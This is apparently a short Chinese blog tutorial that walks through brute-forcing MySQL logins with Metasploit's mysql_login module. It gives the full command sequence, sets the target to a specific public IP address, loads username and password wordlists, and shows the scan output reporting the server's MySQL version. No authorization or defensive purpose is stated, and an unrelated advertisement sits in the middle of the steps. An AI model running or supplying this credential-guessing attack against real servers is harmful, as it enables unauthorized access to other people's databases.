msf mysql prot:3306
-
nmap扫出3306端口的话,就往下;
-
搜索漏洞
SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。
msf > search mysql_login
- 使用该漏洞
msf > use auxiliary/scanner/mysql/mysql_login
- 查看该漏洞用法
msf auxiliary(mysql_login) > show options
- 向rhosts输入ip,看到可以正常访问mysql
msf auxiliary(mysql_login) > set rhosts 121.42.27.192
- 找一个测试爆破的用户名字典和密码字典进行爆破
msf auxiliary(mysql_login) > set user_file /usr/share/metasploit-framework/data/wordlists/unix_users.txt
msf auxiliary(mysql_login) > set pass_file /usr/share/sparta/wordlists/mysql-default-userpass.txt
- run
msf auxiliary(mysql_login) > run
# 运行可以查看到mysql版本为5.6.29
[*] 121.42.27.192:3306 MYSQL - Found remote MySQL version 5.6.29
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
# 看到绿色加号即为破解成功!
更多精彩